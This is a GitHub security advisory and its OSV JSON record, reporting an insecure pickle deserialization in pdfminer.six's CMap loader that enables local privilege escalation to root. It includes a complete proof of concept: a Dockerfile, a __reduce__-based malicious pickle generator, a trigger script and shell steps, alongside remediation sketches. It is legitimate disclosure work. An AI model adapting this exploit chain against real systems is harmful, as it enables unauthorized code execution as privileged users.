ghsa-f83h-ghpp-7wcc
Vulnerability from github
Published
2025-11-07 23:17
Modified
2025-11-15 02:27
Summary
Insecure Deserialization (pickle) in pdfminer.six CMap Loader — Local Privesc
Details

🚀 Overview

This report demonstrates a real-world privilege escalation vulnerability in pdfminer.six due to unsafe usage of Python's pickle module for CMap file loading. It shows how a low-privileged user can gain root access (or escalate to any service account) by exploiting insecure deserialization in a typical multi-user or server environment.

🚨 Special Note

This advisory addresses a distinct vulnerability from GHSA-wf5f-4jwr-ppcp (CVE-2025-64512).

Although the fix for that CVE is described as mitigating unsafe deserialization, the patch introduced in commit b808ee05dd7f0c8ea8ec34bdf394d40e63501086 does not address the vulnerability reported here.

Testing against the latest version of the library (20251107; see the 20250506...20251107 comparison view) shows that local privilege escalation is still possible because CMap data is still loaded from pickle files. The Dockerfile in this report checks out the patched commit so that this claim can be reproduced.

The patch for CVE-2025-64512 is therefore incomplete, and this advisory documents a distinct, independently fixable flaw. A correct remediation must remove the dependency on pickle files (or otherwise eliminate unsafe deserialization) and replace it with a safe, auditable data format so that the library can operate normally without relying on pickle.
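As one possible direction for such a remediation, the following is a minimal sketch that reads CMap data from gzip-compressed JSON instead of pickle. The `.json.gz` format, the `load_cmap_json` helper and the schema checks are assumptions made for illustration; they are not part of pdfminer.six and not the maintainers' fix.

```python
import gzip
import json
from typing import Any, Dict


def load_cmap_json(path: str) -> Dict[str, Any]:
    """Load CMap data from a gzip-compressed JSON file (hypothetical format).

    json.load only builds dicts, lists, strings, numbers, booleans and None,
    so parsing the file cannot invoke attacker-chosen callables.
    """
    with gzip.open(path, "rt", encoding="utf-8") as fh:
        data = json.load(fh)
    if not isinstance(data, dict):
        raise ValueError("CMap file must contain a JSON object")
    # Hypothetical schema check, mirroring the keys used in the PoC payload.
    if not isinstance(data.get("IS_VERTICAL", False), bool):
        raise ValueError("IS_VERTICAL must be a boolean")
    if not isinstance(data.get("CODE2CID", {}), dict):
        raise ValueError("CODE2CID must be an object")
    return data
```

JSON object keys are always strings, so a real migration would need to convert any integer-keyed mappings back after loading.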

🔍 Background

pdfminer.six is a popular Python library for extracting text and information from PDF files. It supports CJK (Chinese, Japanese, Korean) fonts via external CMap files, which it loads from disk using Python's pickle module.

🐍 Security Issue: If the CMap search path (CMAP_PATH or default directories) includes a world-writable or user-writable directory, an attacker can place a malicious .pickle.gz file that will be loaded and deserialized by pdfminer.six, leading to arbitrary code execution.
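A deployment can check for this precondition before running pdfminer.six with elevated privileges. The sketch below flags a CMap directory whose mode bits grant write access to group or other. The helper names are hypothetical, and the `/usr/share/pdfminer/` fallback is an assumption about the library's default rather than something stated in this advisory.

```python
import os
import stat
from typing import List


def writable_by_others(path: str) -> bool:
    """Return True if the mode bits grant write access to group or other."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def risky_cmap_dirs(default_dir: str = "/usr/share/pdfminer/") -> List[str]:
    """List existing CMap search directories that non-owners can write to.

    default_dir is an assumed fallback used when CMAP_PATH is unset.
    """
    candidates = [os.environ.get("CMAP_PATH", default_dir)]
    return [d for d in candidates if os.path.isdir(d) and writable_by_others(d)]
```

This only inspects mode bits. A directory owned by an untrusted account is just as dangerous even when its mode looks restrictive, so ownership should be reviewed as well.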


🐍 Vulnerability Description

  • Component: pdfminer.six CMap loading (pdfminer/cmapdb.py)
  • Issue: Loads and deserializes .pickle.gz files using Python’s pickle module, which is unsafe for untrusted data.
  • Exploitability: If a low-privileged user can write to any directory in CMAP_PATH, they can execute code as the user running pdfminer—potentially root or a privileged service.
  • Impact: Full code execution as the service user, privilege escalation from user to root, persistence, and potential lateral movement.
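To see why pickle is unsafe for untrusted data, consider this harmless, self-contained illustration. The `Payload` class is hypothetical and calls the built-in `sorted` where an attacker would name a dangerous callable.

```python
import pickle


class Payload:
    def __reduce__(self):
        # Tells pickle: "to rebuild this object, call sorted([3, 1, 2])".
        # An attacker would name something like os.system here instead.
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Payload())
result = pickle.loads(blob)  # the unpickler calls sorted(...) while loading
print(result)  # [1, 2, 3]: a function's return value, not a Payload instance
```

The call happens inside `pickle.loads` itself, before the caller has any chance to inspect the result.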

🎭 Demo Scenario

Environment:

  • 🐧 Alpine Linux (Docker container)
  • 👨‍💻 Two users: user1 (attacker: low-privilege) and root (victim: runs privileged PDF-processing script)
  • 🗂️ Shared writable directory: /tmp/uploads
  • 🛣️ CMAP_PATH set to /tmp/uploads for the privileged script
  • 📦 pdfminer.six installed system-wide

Attack Flow:

  1. 🕵️‍♂️ user1 creates a malicious CMap file (Evil.pickle.gz) in /tmp/uploads.
  2. 👑 The privileged service (root) processes a PDF or calls get_cmap("Evil").
  3. 💣 The malicious pickle is deserialized, running arbitrary code as root.
  4. 🎯 The exploit creates a flag file in /root/pwnedByPdfminer as proof.

🧨 Technical Details

  • Vulnerability Type: Insecure deserialization of untrusted data using Python's pickle
  • Attack Prerequisites: Attacker can write to a directory included in CMAP_PATH
  • Vulnerable Line (in pdfminer/cmapdb.py's _load_data method): return type(str(name), (), pickle.loads(gzfile.read()))
  • Source: https://github.com/pdfminer/pdfminer.six/blob/20250506/pdfminer/cmapdb.py#L246
  • Proof of Concept: See createEvilPickle.py, evilmod.py, and processPDF.py

Exploit Chain:

  • Attacker places a malicious .pickle.gz file in the CMap search path.
  • Privileged process (e.g., root) loads a CMap, triggering pickle deserialization.
  • Arbitrary code executes with the privilege of the process (root/service account).
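The chain depends on the unpickler being allowed to resolve and call arbitrary globals. As a stopgap sketch only (this advisory recommends removing pickle altogether), the "restricting globals" pattern from the Python documentation rejects every global lookup. `NoGlobalsUnpickler` and `safe_loads` are hypothetical names, and the sketch assumes, without verification, that legitimate CMap pickles contain only built-in containers and scalars.

```python
import io
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses to import any module-level object."""

    def find_class(self, module, name):
        # Every GLOBAL / STACK_GLOBAL opcode is resolved through find_class,
        # so raising here blocks payloads that name a callable to invoke.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_loads(data: bytes):
    """Deserialize data that consists only of plain built-in values."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()
```

Plain dicts, lists, strings, numbers and booleans still load, because they are encoded with dedicated opcodes rather than global lookups; a payload built with `__reduce__` fails with `pickle.UnpicklingError`.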

🔧 Setup and Usage

📁 Files

</> Dockerfile

```dockerfile
FROM python:3.11-alpine

ARG PM_COMMIT=b808ee05dd7f0c8ea8ec34bdf394d40e63501086

# Install git and build tooling
RUN apk add --no-cache git build-base

WORKDIR /opt

# Clone pdfminer.six and check out the specific commit, then install from source
RUN git clone https://github.com/pdfminer/pdfminer.six.git && \
    cd pdfminer.six && \
    git fetch --all && \
    git checkout ${PM_COMMIT} && \
    pip install --no-cache-dir -e .

# App working directory for PoC
WORKDIR /app

# Create low-privilege user and uploads dir
RUN adduser -D user1 && \
    mkdir -p /tmp/uploads && \
    chown user1:user1 /tmp/uploads && \
    chmod 1777 /tmp/uploads

# Copy PoC files
COPY evilmod.py /app/evilmod.py
COPY createEvilPickle.py /app/createEvilPickle.py
COPY processPDF.py /app/processPDF.py

ENV CMAP_PATH=/tmp/uploads
ENV PYTHONUNBUFFERED=1

# Keep the container running in background so you can exec into it anytime.
CMD ["tail", "-f", "/dev/null"]
```

</> evilmod.py

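```python
import os


def evilFunc():
    # Runs inside the victim process during unpickling; writes the proof file.
    with open("/root/pwnedByPdfminer", "w") as f:
        f.write("ROOTED by pdfminer pickle RCE\n")
    # Return CMap-shaped data so the caller sees a normal-looking result.
    return {"CODE2CID": {}, "IS_VERTICAL": False}
```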

</> createEvilPickle.py

```python
import pickle
import gzip
from evilmod import evilFunc


class Evil:
    def __reduce__(self):
        # On load, pickle calls evilFunc() instead of rebuilding an Evil object.
        return (evilFunc, ())


payload = pickle.dumps(Evil())
with gzip.open("/tmp/uploads/Evil.pickle.gz", "wb") as f:
    f.write(payload)

print("Malicious pickle created at /tmp/uploads/Evil.pickle.gz")
```

</> processPDF.py

```python
import os
from pdfminer.cmapdb import CMapDB

os.environ["CMAP_PATH"] = "/tmp/uploads"

CMapDB.get_cmap("Evil")

print("CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.")
```

1️⃣ Build and start the demo container

```bash
docker build -t pdfminer-priv-esc-demo .
docker run --rm -it --name pdfminer-demo pdfminer-priv-esc-demo
```

2️⃣ In the container, open two shells in parallel (or switch users in one):

🕵️‍♂️ Shell 1 (Attacker: user1)

```bash
su user1
cd /app
python createEvilPickle.py
# ✅ Confirms: /tmp/uploads/Evil.pickle.gz is created and owned by user1
```

👑 Shell 2 (Victim: root)

```bash
cd /app
python processPDF.py
# 🎯 Output: If vulnerable, /root/pwnedByPdfminer will be created
```

3️⃣ Proof of escalation

```bash
cat /root/pwnedByPdfminer
# 🏴 Output: ROOTED by pdfminer pickle RCE
```

📝 Step-by-step Walkthrough

  1. user1 uses createEvilPickle.py to craft and place a malicious CMap pickle in a shared upload directory.
  2. The root user runs a typical PDF-processing script, which loads CMap files from that directory.
  3. The exploit triggers, running arbitrary code as root.
  4. The attacker now has proof of code execution as root (and, in a real attack, could escalate further).
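A defender can triage a file such as the one planted in step 1 without ever loading it. The sketch below walks the pickle opcode stream with the standard-library `pickletools.genops` and reports opcodes that import globals or invoke callables. The `suspicious_opcodes` helper and the choice of opcode set are illustrative assumptions, not an exhaustive detector.

```python
import gzip
import pickletools
from typing import Set

# Opcodes that import a global or construct/call objects during unpickling.
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST",
    "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD",
}


def suspicious_opcodes(path: str) -> Set[str]:
    """Return risky opcode names found in a .pickle.gz file, without loading it."""
    with gzip.open(path, "rb") as fh:
        data = fh.read()
    # genops only parses the byte stream; it never executes the pickle.
    found = {op.name for op, _arg, _pos in pickletools.genops(data)}
    return found & SUSPICIOUS_OPCODES
```

A pickle made only of plain dicts and scalars yields an empty set, while a `__reduce__`-based payload shows at least `REDUCE`.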

🛡️ Security Standards & References

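  • CVSS (Common Vulnerability Scoring System): base score 7.8 (High), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • OWASP Top 10: A08:2021 - Software and Data Integrity Failures; A03:2021 - Injection (by analogy, as it is code injection via deserialization)
  • MITRE CWE: CWE-502: Deserialization of Untrusted Data; CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes
  • MITRE ATT&CK: T1055: Process Injection; T1548: Abuse Elevation Control Mechanism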


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pdfminer.six"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "20251107"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-502",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-07T23:17:05Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### \ud83d\ude80 Overview\n\nThis report **demonstrates a real-world privilege escalation** vulnerability in [pdfminer.six](https://github.com/pdfminer/pdfminer.six) due to unsafe usage of Python\u0027s `pickle` module for CMap file loading.\nIt shows how a low-privileged user can gain root access (or escalate to any service account) by exploiting insecure deserialization in a typical multi-user or server environment.\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n## \ud83d\udea8 Special Note\n\nThis advisory addresses a distinct vulnerability from [GHSA-wf5f-4jwr-ppcp (CVE-2025-64512)](https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-wf5f-4jwr-ppcp).\n\nWhile the previous CVE claims to mitigate issues related to unsafe deserialization, the patch introduced in commit [b808ee05dd7f0c8ea8ec34bdf394d40e63501086](https://github.com/pdfminer/pdfminer.six/commit/b808ee05dd7f0c8ea8ec34bdf394d40e63501086) does not address the vulnerability reported here.\n\nBased on testing performed against the latest version of the library ([comparison view](https://github.com/pdfminer/pdfminer.six/compare/20250506...20251107)), the issue remains exploitable through local privilege escalation due to continued unsafe use of pickle files. The **Dockerfile** is hence modified to run test against this claim.\n\nThis demonstrates that the patch for **CVE-2025-64512** is incomplete: the vulnerability remains exploitable. This advisory therefore documents a distinct, independently fixable flaw. 
A correct remediation must remove the dependency on pickle files (or otherwise eliminate unsafe deserialization) and replace it with a safe, auditable data-handling approach so the library can operate normally without relying on ```pickle```\n\n## \ud83d\udcda Table of Contents\n\n- [\ud83d\udd0d Background](#-background)\n- [\ud83d\udc0d Vulnerability Description](#-vulnerability-description)\n- [\ud83c\udfad Demo Scenario](#-demo-scenario)\n- [\ud83e\udde8 Technical Details](#-technical-details)\n- [\ud83d\udd27 Setup and Usage](#-setup-and-usage)\n- [\ud83d\udcdd Step-by-step Walkthrough](#-step-by-step-walkthrough)\n- [\ud83d\udee1\ufe0f Security Standards \u0026 References](#-security-standards--references)\n---\n\n## \ud83d\udd0d Background\n\n**pdfminer.six** is a popular Python library for extracting text and information from PDF files. It supports CJK (Chinese, Japanese, Korean) fonts via external CMap files, which it loads from disk using Python\u0027s `pickle` module.\n\n\u003e \ud83d\udc0d **Security Issue:**\n\u003e If the CMap search path (`CMAP_PATH` or default directories) includes a world-writable or user-writable directory, an attacker can place a malicious `.pickle.gz` file that will be loaded and deserialized by pdfminer.six, leading to arbitrary code execution.\n\n---\n\n### \ud83d\udc0d Vulnerability Description\n\n- **Component:** pdfminer.six CMap loading (`pdfminer/cmapdb.py`)\n- **Issue:** Loads and deserializes `.pickle.gz` files using Python\u2019s `pickle` module, which is unsafe for untrusted data.\n- **Exploitability:** If a low-privileged user can write to any directory in `CMAP_PATH`, they can execute code as the user running pdfminer\u2014potentially root or a privileged service.\n- **Impact:** Full code execution as the service user, privilege escalation from user to root, persistence, and potential lateral 
movement.\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n### \ud83c\udfad Demo Scenario\n\n**Environment:**\n- \ud83d\udc27 Alpine Linux (Docker container)\n- \ud83d\udc68\u200d\ud83d\udcbb Two users:\n  - `user1` (attacker: low-privilege)\n  - `root` (victim: runs privileged PDF-processing script)\n- \ud83d\uddc2\ufe0f Shared writable directory: `/tmp/uploads`\n- \ud83d\udee3\ufe0f `CMAP_PATH` set to `/tmp/uploads` for the privileged script\n- \ud83d\udce6 pdfminer.six installed system-wide\n\n**Attack Flow:**\n1. \ud83d\udd75\ufe0f\u200d\u2642\ufe0f `user1` creates a malicious CMap file (`Evil.pickle.gz`) in `/tmp/uploads`.\n2. \ud83d\udc51 The privileged service (`root`) processes a PDF or calls `get_cmap(\"Evil\")`.\n3. \ud83d\udca3 The malicious pickle is deserialized, running arbitrary code as root.\n4. \ud83c\udfaf The exploit creates a flag file in `/root/pwnedByPdfminer` as proof.\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n### \ud83e\udde8 Technical Details\n\n- **Vulnerability Type:** Insecure deserialization of untrusted data using Python\u0027s `pickle`\n- **Attack Prerequisites:** Attacker can write to a directory included in `CMAP_PATH`\n- **Vulnerable Line:**\n  ```python\n  return type(str(name), (), pickle.loads(gzfile.read()))\n  ```\n  *In `pdfminer/cmapdb.py`\u0027s `_load_data` method*\n- https://github.com/pdfminer/pdfminer.six/blob/20250506/pdfminer/cmapdb.py#L246\n- **Proof of Concept:** See `createEvilPickle.py`, `evilmod.py`, and `processPdf.py`\n\n**Exploit Chain:**\n- Attacker places a malicious `.pickle.gz` file in the CMap search path.\n- Privileged process (e.g., root) loads a CMap, triggering pickle deserialization.\n- Arbitrary code executes with the privilege of the process (root/service 
account).\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n## \ud83d\udd27 Setup and Usage\n\n### \ud83d\udcc1 Files\n#### \u003c/\u003e Dockerfile\n```yml\nFROM python:3.11-alpine\n\nARG PM_COMMIT=b808ee05dd7f0c8ea8ec34bdf394d40e63501086\n\n# Install git and build tooling\nRUN apk add --no-cache git build-base\n\nWORKDIR /opt\n\n# Clone pdfminer.six and check out the specific commit, then install from source\nRUN git clone https://github.com/pdfminer/pdfminer.six.git \u0026\u0026 \\\n    cd pdfminer.six \u0026\u0026 \\\n    git fetch --all \u0026\u0026 \\\n    git checkout ${PM_COMMIT} \u0026\u0026 \\\n    pip install --no-cache-dir -e .\n\n# App working directory for PoC\nWORKDIR /app\n\n# Create low-privilege user and uploads dir\nRUN adduser -D user1 \u0026\u0026 \\\n    mkdir -p /tmp/uploads \u0026\u0026 \\\n    chown user1:user1 /tmp/uploads \u0026\u0026 \\\n    chmod 1777 /tmp/uploads\n\n# Copy PoC files\nCOPY evilmod.py /app/evilmod.py\nCOPY createEvilPickle.py /app/createEvilPickle.py\nCOPY processPDF.py /app/processPDF.py\n\nENV CMAP_PATH=/tmp/uploads\nENV PYTHONUNBUFFERED=1\n\n# Keep the container running in background so you can exec into it anytime.\nCMD [\"tail\", \"-f\", \"/dev/null\"]\n\n```\n\n#### \u003c/\u003e evilmod.py\n```python\nimport os\n\ndef evilFunc():\n    with open(\"/root/pwnedByPdfminer\", \"w\") as f:\n        f.write(\"ROOTED by pdfminer pickle RCE\\n\")\n    return {\"CODE2CID\": {}, \"IS_VERTICAL\": False}\n```\n#### \u003c/\u003e createEvilPickle.py\n```python\nimport pickle\nimport gzip\nfrom evilmod import evilFunc\n\nclass Evil:\n    def __reduce__(self):\n        return (evilFunc, ())\n\npayload = pickle.dumps(Evil())\nwith gzip.open(\"/tmp/uploads/Evil.pickle.gz\", \"wb\") as f:\n    f.write(payload)\n\nprint(\"Malicious pickle created at /tmp/uploads/Evil.pickle.gz\")\n```\n#### \u003c/\u003e processPDF.py\n```python\nimport os\nfrom pdfminer.cmapdb import 
CMapDB\n\nos.environ[\"CMAP_PATH\"] = \"/tmp/uploads\"\n\nCMapDB.get_cmap(\"Evil\")\n\nprint(\"CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.\")\n```\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n### 1\ufe0f\u20e3 Build and start the demo container\n\n```bash\ndocker build -t pdfminer-priv-esc-demo .\ndocker run --rm -it --name pdfminer-demo pdfminer-priv-esc-democ\n```\n\n### 2\ufe0f\u20e3 In the container, open two shells in parallel (or switch users in one):\n\n#### \ud83d\udd75\ufe0f\u200d\u2642\ufe0f Shell 1 (Attacker: user1)\n```bash\nsu user1\ncd /app\npython createEvilPickle.py\n# \u2705 Confirms: /tmp/uploads/Evil.pickle.gz is created and owned by user1\n```\n\n#### \ud83d\udc51 Shell 2 (Victim: root)\n```bash\ncd /app\npython processPdf.py\n# \ud83c\udfaf Output: If vulnerable, /root/pwnedByPdfminer will be created\n```\n\n### 3\ufe0f\u20e3 Proof of escalation\n\n```bash\ncat /root/pwnedByPdfminer\n# \ud83c\udff4 Output: ROOTED by pdfminer pickle RCE\n```\n\n\u003cimg width=\"815\" height=\"889\" alt=\"proof-of-exploit\" src=\"https://github.com/user-attachments/assets/f465d17c-a3af-49c5-9dbc-eec9635b36fc\" /\u003e\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n## \ud83d\udcdd Step-by-step Walkthrough\n\n1. **user1** uses `createEvilPickle.py` to craft and place a malicious CMap pickle in a shared upload directory.\n2. The **root** user runs a typical PDF-processing script, which loads CMap files from that directory.\n3. The exploit triggers, running arbitrary code as root.\n4. 
The attacker now has proof of code execution as root (and, in a real attack, could escalate further).\n\n![line](https://user-images.githubusercontent.com/74038190/212284100-561aa473-3905-4a80-b561-0d28506553ee.gif)\n\n## \ud83d\udee1\ufe0f Security Standards \u0026 References\n\n- **CVSS (Common Vulnerability Scoring System):**\n  - **Base Score:** 7.8 (High)\n  - **Vector:** `AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`\n\n- **OWASP Top 10:**\n  - [A08:2021 - Software and Data Integrity Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/)\n  - [A03:2021 - Injection](https://owasp.org/Top10/A03_2021-Injection/) (by analogy, as it\u0027s code injection via deserialization)\n\n- **MITRE CWE References:**\n  - [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n  - [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html)\n\n- **MITRE ATT\u0026CK Techniques:**\n  - [T1055: Process Injection](https://attack.mitre.org/techniques/T1055/)\n  - [T1548: Abuse Elevation Control Mechanism](https://attack.mitre.org/techniques/T1548/)",
  "id": "GHSA-f83h-ghpp-7wcc",
  "modified": "2025-11-15T02:27:59Z",
  "published": "2025-11-07T23:17:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-f83h-ghpp-7wcc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pdfminer/pdfminer.six/commit/b808ee05dd7f0c8ea8ec34bdf394d40e63501086"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pdfminer/pdfminer.six"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Insecure Deserialization (pickle) in pdfminer.six CMap Loader \u2014 Local Privesc"
}

